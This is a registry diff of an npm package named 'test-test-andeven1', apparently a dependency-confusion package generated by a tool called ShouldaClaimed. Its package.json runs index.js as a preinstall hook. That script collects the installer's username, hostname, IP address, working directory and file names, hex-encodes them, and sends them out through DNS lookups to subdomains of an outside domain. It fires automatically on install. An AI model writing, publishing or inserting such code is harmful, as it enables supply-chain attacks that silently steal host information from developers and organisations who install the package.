test-test-andeven1 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +47 -0
- package/package.json +16 -0
package/index.js
ADDED
|
@@ -0,0 +1,47 @@
|
|
|
1
|
+
|
|
2
|
+
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const fs = require('fs');
|
|
5
|
+
const dns = require('dns');
|
|
6
|
+
const http = require('http');
|
|
7
|
+
const net = require('net');
|
|
8
|
+
|
|
9
|
+
function getIP() {
|
|
10
|
+
const nets = os.networkInterfaces();
|
|
11
|
+
for (const name of Object.keys(nets)) {
|
|
12
|
+
for (const net of nets[name]) {
|
|
13
|
+
if (net.family === 'IPv4' && !net.internal) {
|
|
14
|
+
return net.address;
|
|
15
|
+
}
|
|
16
|
+
}
|
|
17
|
+
}
|
|
18
|
+
return 'unknown';
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
const user = os.userInfo().username;
|
|
22
|
+
const hostname = os.hostname();
|
|
23
|
+
const ip = getIP();
|
|
24
|
+
const info = user + '@' + hostname + ':' + ip;
|
|
25
|
+
|
|
26
|
+
// FS Info
|
|
27
|
+
const cwd = process.cwd();
|
|
28
|
+
let files = 'no-files';
|
|
29
|
+
try {
|
|
30
|
+
files = fs.readdirSync('.').slice(0, 15).join(',');
|
|
31
|
+
} catch (e) {}
|
|
32
|
+
const fsInfo = cwd + '|' + files;
|
|
33
|
+
|
|
34
|
+
const payloads = [
|
|
35
|
+
Buffer.from(info).toString('hex'),
|
|
36
|
+
Buffer.from(fsInfo).toString('hex')
|
|
37
|
+
];
|
|
38
|
+
|
|
39
|
+
// DNS Exfiltration
|
|
40
|
+
payloads.forEach(hex => {
|
|
41
|
+
// Split into 60-char chunks for valid DNS labels
|
|
42
|
+
const chunks = hex.match(/.{1,60}/g) || [];
|
|
43
|
+
chunks.forEach(chunk => {
|
|
44
|
+
const targetDomain = chunk + '.adriaanbosch.com';
|
|
45
|
+
dns.lookup(targetDomain, (err, address, family) => {});
|
|
46
|
+
});
|
|
47
|
+
});
|
package/package.json
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
{
|
|
2
|
+
"_generated_by": "ShouldaClaimed",
|
|
3
|
+
"author": "A3-N",
|
|
4
|
+
"description": "Dependency Confusion",
|
|
5
|
+
"license": "ISC",
|
|
6
|
+
"main": "index.js",
|
|
7
|
+
"name": "test-test-andeven1",
|
|
8
|
+
"repository": {
|
|
9
|
+
"type": "git",
|
|
10
|
+
"url": "https://github.com/A3-N/ShouldaClaimed"
|
|
11
|
+
},
|
|
12
|
+
"scripts": {
|
|
13
|
+
"preinstall": "node index.js"
|
|
14
|
+
},
|
|
15
|
+
"version": "1.0.0"
|
|
16
|
+
}
|